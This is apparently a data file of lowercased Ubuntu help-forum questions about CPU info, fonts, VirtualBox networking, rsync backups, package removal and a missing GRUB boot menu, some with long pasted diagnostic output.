507406	is this cpu architecture information from lscpu normal ?	with command lscpu i have output as follows : architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 4 on-line cpu ( s ) list : 0-3 thread ( s ) per core : 2 core ( s ) per socket : 2 socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 42 stepping : 7 cpu mhz : 800.000 bogomips : 5587.22 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 256k l3 cache : 4096k numa node0 cpu ( s ) : 0-3 now in l2 cache is shown 256k ? should n't it be 4096k too ? !
507410	what is the `` input method '' application used for ?	`` input method '' or `` im-config '' is an application installed by default on 14.04 . what does it do ? what do people typically use it for ? why did ubuntu see it as necessary to install by default on their distribution ?
507411	nautilus thumbnails do n't appear in 14.04	this is a fresh install of ubuntu 14.04 . in nautilus > edit > preferences > preview i have `` show thumbnails '' as `` local files only '' and `` only for files smaller than '' 100mb . changing those settings to anything else does n't generate thumbs either . ~/.cache/thumbnails is owned by me , and i can see thumbnails in there for the desktop backgrounds but nothing else . i have ubuntu-restricted-extras installed . i do n't see thumbs for any file type or size . nothing at all .
507417	removing a plethora of default installed packages	i just bourght a vps , imaged with ubuntu 12.04 , and i notice right out of the box it 's using 10 % ram . i then proceeded to run this : dpkg-query -wf ' $ { package ; -40 } $ { priority } \n ' | sort -b -k2,2 -k1,1 and got this huge list . i can see right out of the top i do n't need 97 % of these , however it would take me the better part of a day to syphon through each package and removing it . is there any way i can select all the optional/extra packages from this list , and remove them , without causing me loss of access to my vps via ssh ? i have removed all packages marked as required and important from the list , as noone cares . db-util extra diff extra ia32-libs extra ia32-libs-multiarch extra iputils-arping extra klogd extra libavc1394-0 extra libcapi20-3 extra libdb4.8 extra libjson0 extra libnfnetlink0 extra librtmp0 extra lsb-release extra lynx extra lynx-cur extra makedev extra mktemp extra oss-compat extra rmail extra sendmail extra sendmail-base extra sendmail-bin extra sendmail-cf extra sendmail-doc extra sensible-mda extra sysklogd extra xinetd extra acl optional apache2 optional apache2-doc optional apache2-mpm-prefork optional apache2-utils optional apache2.2-bin optional apache2.2-common optional bind9 optional bind9utils optional binutils optional bluez optional bluez-alsa optional busybox-initramfs optional bzip2 optional ca-certificates optional cifs-utils optional console-common optional console-data optional console-tools optional console-tools-dev optional cracklib-runtime optional db5.1-util optional dbus optional dbus-x11 optional dconf-gsettings-backend optional dconf-service optional debconf-utils optional defoma optional dmsetup optional dselect optional ed optional esound-common optional expat optional fetchmail optional finger optional fontconfig optional fontconfig-config optional gawk optional gconf-service optional gconf-service-backend optional gconf2 optional gconf2-common optional gettext optional glib-networking optional glib-networking-common optional glib-networking-services optional gsettings-desktop-schemas optional gstreamer0.10-plugins-base optional gstreamer0.10-plugins-good optional gtk2-engines optional gtk2-engines-murrine optional gtk2-engines-oxygen optional gtk2-engines-pixbuf optional gvfs optional gvfs-common optional gvfs-daemons optional gvfs-libs optional gvfs-libs optional ibus-gtk optional initramfs-tools optional initramfs-tools-bin optional insserv optional iputils-tracepath optional iso-codes optional klibc-utils optional ldap-utils optional libaa1 optional libaio1 optional libao-common optional libao4 optional libapr1 optional libaprutil1 optional libaprutil1-dbd-sqlite3 optional libaprutil1-ldap optional libasn1-8-heimdal optional libasn1-8-heimdal optional libasound2 optional libasound2-plugins optional libasyncns0 optional libatasmart4 optional libatk1.0-0 optional libatk1.0-data optional libaudio2 optional libaudiofile1 optional libavahi-client3 optional libavahi-client3 optional libavahi-common-data optional libavahi-common-data optional libavahi-common3 optional libavahi-common3 optional libbsd0 optional libcaca0 optional libcairo-gobject2 optional libcairo2 optional libcanberra-gtk-module optional libcanberra-gtk0 optional libcanberra0 optional libcap-ng0 optional libcdparanoia0 optional libconsole optional libcrack2 optional libcroco3 optional libcroco3 optional libcups2 optional libcups2 optional libcupsimage2 optional libcurl3 optional libdatrie1 optional libdbus-1-3 optional libdbus-1-3 optional libdbus-glib-1-2 optional libdbus-glib-1-2 optional libdconf0 optional libdevmapper-event1.02.1 optional libdrm-intel1 optional libdrm-nouveau1a optional libdrm-radeon1 optional libdrm2 optional libdrm2 optional libdv4 optional libelf1 optional libesd0 optional libexif12 optional libexpat1 optional libexpat1 optional libffi6 optional libffi6 optional libfile-copy-recursive-perl optional libflac8 optional libfontconfig1 optional libfontconfig1 optional libfontenc1 optional libfreetype6 optional libfreetype6 optional libgail-common optional libgail18 optional libgconf-2-4 optional libgconf-2-4 optional libgd2-xpm optional libgdk-pixbuf2.0-0 optional libgdk-pixbuf2.0-common optional libgdu0 optional libgeoip1 optional libgettextpo0 optional libgettextpo0 optional libgl1-mesa-glx optional libgl1-mesa-glx optional libglapi-mesa optional libglapi-mesa optional libglib2.0-0 optional libglib2.0-0 optional libglu1-mesa optional libgnome-keyring-common optional libgnome-keyring0 optional libgnome-keyring0 optional libgomp1 optional libgomp1 optional libgphoto2-2 optional libgphoto2-port0 optional libgssapi3-heimdal optional libgssapi3-heimdal optional libgstreamer-plugins-base0.10-0 optional libgstreamer0.10-0 optional libgtk2.0-0 optional libgtk2.0-common optional libhcrypto4-heimdal optional libhcrypto4-heimdal optional libheimbase1-heimdal optional libheimbase1-heimdal optional libheimntlm0-heimdal optional libheimntlm0-heimdal optional libhx509-5-heimdal optional libhx509-5-heimdal optional libibus-1.0-0 optional libice6 optional libice6 optional libiec61883-0 optional libieee1284-3 optional libisccc80 optional libisccfg82 optional libjack-jackd2-0 optional libjasper1 optional libjpeg-turbo8 optional libjpeg8 optional libklibc optional libkrb5-26-heimdal optional libkrb5-26-heimdal optional liblcms1 optional libltdl7 optional libltdl7 optional liblvm2app2.2 optional libmad0 optional libmikmod2 optional libmng1 optional libmpg123-0 optional libnl-3-200 optional libnl-genl-3-200 optional libnspr4 optional libnss3 optional libodbc1 optional libodbc1 optional libogg0 optional libopenal-data optional libopenal1 optional liborc-0.4-0 optional libpango1.0-0 optional libpaper1 optional libparted0debian1 optional libpcap0.8 optional libpciaccess0 optional libperl5.14 optional libpixman-1-0 optional libplymouth2 optional libpng12-0 optional libpng12-0 optional libpolkit-gobject-1-0 optional libproxy1 optional libproxy1 optional libpulse-mainloop-glib0 optional libpulse0 optional libpulsedsp optional libpython2.7 optional libqt4-dbus optional libqt4-declarative optional libqt4-designer optional libqt4-network optional libqt4-opengl optional libqt4-qt3support optional libqt4-script optional libqt4-scripttools optional libqt4-sql optional libqt4-svg optional libqt4-test optional libqt4-xml optional libqt4-xmlpatterns optional libqtcore4 optional libqtgui4 optional libqtwebkit4 optional libraw1394-11 optional libroken18-heimdal optional libroken18-heimdal optional librsvg2-2 optional librsvg2-common optional libsamplerate0 optional libsane optional libsane-common optional libsdl-image1.2 optional libsdl-mixer1.2 optional libsdl-net1.2 optional libsdl-ttf2.0-0 optional libsdl1.2debian optional libsensors4 optional libsgutils2-2 optional libshout3 optional libsigsegv2 optional libsm6 optional libsm6 optional libsndfile1 optional libsnmp-base optional libsnmp15 optional libsoup-gnome2.4-1 optional libsoup2.4-1 optional libspeex1 optional libspeexdsp1 optional libstdc++5 optional libtag1-vanilla optional libtag1c2a optional libtalloc2 optional libtdb1 optional libtdb1 optional libthai-data optional libthai0 optional libtheora0 optional libtiff4 optional libunistring0 optional libunistring0 optional libv4l-0 optional libv4lconvert0 optional libvisual-0.4-0 optional libvorbis0a optional libvorbisenc2 optional libvorbisfile3 optional libwavpack1 optional libwbclient0 optional libwind0-heimdal optional libwind0-heimdal optional libwrap0 optional libwrap0 optional libx11-6 optional libx11-6 optional libx11-data optional libx11-xcb1 optional libx11-xcb1 optional libxau6 optional libxau6 optional libxaw7 optional libxaw7 optional libxcb-glx0 optional libxcb-glx0 optional libxcb-render0 optional libxcb-shape0 optional libxcb-shm0 optional libxcb1 optional libxcb1 optional libxcomposite1 optional libxcomposite1 optional libxcursor1 optional libxdamage1 optional libxdamage1 optional libxdmcp6 optional libxdmcp6 optional libxext6 optional libxext6 optional libxfixes3 optional libxfixes3 optional libxft2 optional libxft2 optional libxi6 optional libxi6 optional libxinerama1 optional libxinerama1 optional libxmu6 optional libxmu6 optional libxmuu1 optional libxp6 optional libxpm4 optional libxpm4 optional libxrandr2 optional libxrender1 optional libxrender1 optional libxslt1.1 optional libxss1 optional libxt6 optional libxt6 optional libxtst6 optional libxtst6 optional libxv1 optional libxv1 optional libxxf86dga1 optional libxxf86vm1 optional libxxf86vm1 optional memtester optional mtools optional odbcinst optional odbcinst1debian2 optional odbcinst1debian2 optional openssh-blacklist optional openssh-server optional openssl optional openssl-blacklist optional plymouth optional procinfo optional psmisc optional psutils optional pwgen optional python-dbus optional python-dbus-dev optional python2.7 optional python2.7-minimal optional quota optional rsync optional samba optional samba-common optional samba-common-bin optional sasl2-bin optional screen optional shared-mime-info optional sharutils optional smbfs optional snmp optional sound-theme-freedesktop optional ssl-cert optional sudo optional syslinux optional syslinux-common optional tcpdump optional tcsh optional tofrodos optional ttf-dejavu optional ttf-dejavu-core optional ttf-dejavu-extra optional ttf-freefont optional udisks optional unixodbc optional unzip optional update-inetd optional uuid-runtime optional vim optional vim-runtime optional wide-dhcpv6-client optional x11-common optional x11-utils optional xaw3dg optional bind9-host standard bsd-mailx standard file standard ftp standard gettext-base standard less standard libbind9-80 standard libcap2 standard libcap2 standard libclass-isa-perl standard libdb5.1 standard libdb5.1 standard libdns81 standard libedit2 standard libgcrypt11 standard libgcrypt11 standard libgnutls26 standard libgnutls26 standard libgpg-error0 standard libgpg-error0 standard libgpm2 standard libgpm2 standard libgssapi-krb5-2 standard libgssapi-krb5-2 standard libgssglue1 standard libidn11 standard libidn11 standard libisc83 standard libk5crypto3 standard libk5crypto3 standard libkeyutils1 standard libkeyutils1 standard libkrb5-3 standard libkrb5-3 standard libkrb5support0 standard libkrb5support0 standard libldap-2.4-2 standard libldap-2.4-2 standard liblockfile-bin standard liblockfile1 standard liblwres80 standard libmagic1 standard libp11-kit0 standard libp11-kit0 standard libsasl2-2 standard libsasl2-2 standard libsqlite3-0 standard libsqlite3-0 standard libswitch-perl standard libtasn1-3 standard libtasn1-3 standard libtirpc1 standard libxml2 standard libxml2 standard lsof standard m4 standard make standard mime-support standard mlocate standard multiarch-support standard ncurses-term standard openssh-client standard perl standard perl-modules standard procmail standard rpcbind standard telnet standard ucf standard whois standard i ca n't believe they would install so much rubbish by default ! thanks for any suggestions
507421	ubuntu 14.04.1 lts compatability with my system	best way i can put it , i 'm going to switch to the newest release of ubuntu after years of being tied too windows , i 've dabbled before , and i have loved it ( linux ftw ) but was always hung up on this or that when it came to windows , it was usually gaming , but i do n't game anymore , so on to bigger and better right ? heres my rig http : //imgur.com/bei5fr4 i do n't know if my gpu is compatible atm , if not i 'll get an older release that is , any suggestions are more then welcome ,
507422	ubuntu 12.04 goes blank after password screen	i 'm running ubuntu 12.04 lts on a 20 gb partition of a 2 tb hard drive . i use crashplan as my cloud backup but recently i began getting error messages about not connecting to their backup engine . i looked up solutions for it and one mentioned installing latest updates . so i did that . after the updates installed and restart , i get to the password screen but it freezes and then goes to a blank/maroon screen with no hdd activity . i restarted again and did n't even get to the password screen ... just stayed black . i ran the boot-repair disc and again was able to get to the password screen only to again go to the blank/maroon screen . i have not tried to boot to live disc but not sure what difference that would make if i did . any recommendations are appreciated . otherwise i 'm likely formatting the partition/disk and starting over !
507425	host configuration preventing virtualbox from using dhcp ?	i have an ubuntu 12.04.4 host laptop trying to make an ubuntu 14.04 lts guest installation . i just acquired a dell developer edition notebook ( with ubuntu preinstalled which is the 12.04.4 host ) and originally i copied my previous virtual box into my new notebook . i could n't get a dhcp lease with the exact same settings i had before on another self installed 14.04 lts host computer . i gave up trying to make my previous virtualbox work so i start fresh on the dell developer notebook ... only to find out that at `` configuring the network with dhcp '' of the 14.04 lts server setup disk ; throws the error : network autoconfiguration failed your network is probably not using the dhcp protocol . alternatively , the dhcp server may be slow or some network hardware is not working properly . it 's happening on the start up install in virtualbox as well , so this gives me clues that it 's my new dell notebook . i tried setting this up in two different networks ( which my other ubuntu virtualbox bridge dhcp works fine on other computers on both networks ) . i tried disabling the host 's firewall via sudo ufw disable the internet works otherwise on the dell developer edition notebook , it just seems the guest virtualbox ca n't access the wlan0 bridge in virtualbox or something ? it 's all come down to the pc i just aqcuired and the preinstalled software dell installed . i do n't know what to look for what might be interfering , any other ideas what could be causing this ? update : it seems to work with the ubuntu package lxc via the virtualbox lxcbr0 interface . i 'm not able to make it work with the host wlan0 interface selected for some reason still . however this creates an internal interface and other computers on the network are n't able to talk to my virtual machine . ( i 'm running a web server on port 80 ) how can i get my virtual machine to talk to the rest of the network ? host : lxcbr0 link encap : ethernet hwaddr 86:0f:54:2f:11:93 inet addr:10.0.3.1 bcast:10.0.3.255 mask:255.255.255.0 inet6 addr : fe80 : :840f:54ff : fe2f:1193/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:242 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:33158 ( 33.1 kb ) wlan0 link encap : ethernet hwaddr 28 : b2 : bd:39:50:35 inet addr:192.168.2.20 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :2ab2 : bdff : fe39:5035/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5653 errors:0 dropped:0 overruns:0 frame:0 tx packets:2838 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2146306 ( 2.1 mb ) tx bytes:486353 ( 486.3 kb ) guest : eth0 link encap : ethernet hwaddr 08:00:27:42:33:69 inet addr:10.0.3.68 bcast:10.0.3.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe42:3369/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:64 errors:0 dropped:0 overruns:0 frame:0 tx packets:68 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8877 ( 8.8 kb ) tx bytes:9101 ( 9.1 kb )
507426	can not find m+ fonts i installed	i downloaded m+ fonts , and installed using its script to /usr/share/fonts/x11/mplus . fc-cache shows /usr/share/fonts/x11/mplus : caching , new cache contents : 30 fonts , 0 dirs . but i can not find the font any where . i have allowed bitmap fonts in fontconfig .
507430	copying files without rewriting	i am using two hdds in my small server and i copied hdd1 to hdd2 via `` dd '' . now hdd2 is my backup and i want to keep it up-to-date , but i dont want to dd every now and then . id like to regularly copy all new and modified files to the hdd2 , without rewriting everything . ( because it takes really long ) . all files = config files , data etc . how can i do it ? i tryed rsync -avxhax -- numeric-ids -- progress / /media/ken/asdasdx -- exclude= { /dev/* , /mnt/* , /media/* } > ~/rsync.out but that seems to rewrite all the files aswell . it takes really long to finish it . thanks in advance !
507432	how can i `turn on and off` the functionality for dmesg ?	i have used dmesg -c to clean the history but as i go to /var/log/ . i found the file dmesg and the records in it remain . it 's terrible . the wifi connection information is massive and bothering . i do n't want to see the history anymore . how can i turn on and off the functionality for dmesg ? i want it record the history only when i need . doing some configuration in the .bashrc might be helpful , i think ...
507434	grub boot menu not available after installing ubuntu 14.04 lts on msi ge 60	i installed windows 8.1 on an msi ge60 laptop ; then proceeded to partition it using gparted ( resized the ntfs partitions ) and installed ubuntu 14.04.1 lts in the free space i created /dev/sda8 . when i run bootinfoscript after logging into ubuntu , the output looks as follows ( see below , excuse the rather long cut-paste ) . the problem i am having is that i do not have a grub boot menu that allows me to choose which os to boot into ( i used to be able to do this with 8.04 hardy heron and 10.04 without much trouble on an older laptop ) . it boots into ubuntu by default . the only way i am able to boot into windows is by hitting the delete key when the msi logo appears , entering bios , and changing the value of the option for boot mode select option from legacy to uefi . appreciate if anyone has any ideas or suggestions to help me get the grub boot menu option which gives me both os choices to boot into , so that i do n't have to go into the bios everytime i want to work in windows . thanks in advance for your time & ideas . my settings in /etc/default/grub looks as follows : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' my bootinfoscript results.txt output : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1563601216 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bootx64.efi sda3 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda6 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda8 : __________________________________________________________________________ file system : ext3 boot sector type : - boot sector info : operating system : ubuntu 14.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 1,953,525,167 1,953,525,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 1,230,847 1,228,800 windows recovery environment ( windows ) /dev/sda2 1,230,848 1,845,247 614,400 efi system partition /dev/sda3 1,845,248 2,107,391 262,144 microsoft reserved partition ( windows ) /dev/sda4 2,107,392 485,371,844 483,264,453 data partition ( windows/linux ) /dev/sda5 485,371,845 777,770,909 292,399,065 data partition ( windows/linux ) /dev/sda6 777,770,910 807,105,599 29,334,690 windows recovery environment ( windows ) /dev/sda7 807,106,560 838,746,111 31,639,552 swap partition ( linux ) /dev/sda8 838,746,112 1,953,523,455 1,114,777,344 data partition ( windows/linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 ae0e04680e042bc1 ntfs winre tools /dev/sda2 7406-cb53 vfat system /dev/sda4 96c60823c6080669 ntfs os_install /dev/sda5 c80809ac08099b18 ntfs data /dev/sda6 d60c0bd60c0bb113 ntfs bios_rvy /dev/sda7 aa389ccf-6371-4229-b25c-9ffcbc08f58a swap /dev/sda8 467dd323-cfdc-47e0-b151-f1abfaeca221 ext3 ================================ mount points : ================================= device mount_point type options /dev/sda8 / ext3 ( rw , errors=remount-ro ) =========================== sda8/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt8 -- hint-efi=hd0 , gpt8 -- hint-baremetal=ahci0 , gpt8 467dd323-cfdc-47e0-b151-f1abfaeca221 else search -- no-floppy -- fs-uuid -- set=root 467dd323-cfdc-47e0-b151-f1abfaeca221 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=hidden set timeout=0 # fallback hidden-timeout code in case the timeout_style feature is # unavailable . elif sleep -- interruptible 0 ; then set timeout=0 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-467dd323-cfdc-47e0-b151-f1abfaeca221 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt8 -- hint-efi=hd0 , gpt8 -- hint-baremetal=ahci0 , gpt8 467dd323-cfdc-47e0-b151-f1abfaeca221 else search -- no-floppy -- fs-uuid -- set=root 467dd323-cfdc-47e0-b151-f1abfaeca221 fi linux /boot/vmlinuz-3.13.0-32-generic root=uuid=467dd323-cfdc-47e0-b151-f1abfaeca221 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-32-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-467dd323-cfdc-47e0-b151-f1abfaeca221 ' { menuentry 'ubuntu , with linux 3.13.0-32-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-32-generic-advanced-467dd323-cfdc-47e0-b151-f1abfaeca221 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt8 -- hint-efi=hd0 , gpt8 -- hint-baremetal=ahci0 , gpt8 467dd323-cfdc-47e0-b151-f1abfaeca221 else search -- no-floppy -- fs-uuid -- set=root 467dd323-cfdc-47e0-b151-f1abfaeca221 fi echo 'loading linux 3.13.0-32-generic ... ' linux /boot/vmlinuz-3.13.0-32-generic root=uuid=467dd323-cfdc-47e0-b151-f1abfaeca221 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-32-generic } menuentry 'ubuntu , with linux 3.13.0-32-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-32-generic-recovery-467dd323-cfdc-47e0-b151-f1abfaeca221 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt8 -- hint-efi=hd0 , gpt8 -- hint-baremetal=ahci0 , gpt8 467dd323-cfdc-47e0-b151-f1abfaeca221 else search -- no-floppy -- fs-uuid -- set=root 467dd323-cfdc-47e0-b151-f1abfaeca221 fi echo 'loading linux 3.13.0-32-generic ... ' linux /boot/vmlinuz-3.13.0-32-generic root=uuid=467dd323-cfdc-47e0-b151-f1abfaeca221 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-32-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt8 -- hint-efi=hd0 , gpt8 -- hint-baremetal=ahci0 , gpt8 467dd323-cfdc-47e0-b151-f1abfaeca221 else search -- no-floppy -- fs-uuid -- set=root 467dd323-cfdc-47e0-b151-f1abfaeca221 fi knetbsd /boot/memtest86+.elf } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt8 -- hint-efi=hd0 , gpt8 -- hint-baremetal=ahci0 , gpt8 467dd323-cfdc-47e0-b151-f1abfaeca221 else search -- no-floppy -- fs-uuid -- set=root 467dd323-cfdc-47e0-b151-f1abfaeca221 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda8/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda8 during installation uuid=467dd323-cfdc-47e0-b151-f1abfaeca221 / ext3 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=aa389ccf-6371-4229-b25c-9ffcbc08f58a none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda8 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda2 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 08 5e 1b |.x.msdos5.0 ... ^.| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 c8 12 00 | ... ... .. ? ... ... .| 00000020 00 60 09 00 51 02 00 00 00 00 00 00 02 00 00 00 |.`..q ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 53 cb 06 74 4e 4f 20 4e 41 4d 45 20 20 |.. ) s..tno name | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | fat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 | { ... ... |.v @ .n..v| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a | @ .a..u..r ... u.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd | ... t..f..-.v @ ... | 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s ... ... f ... @ f..| 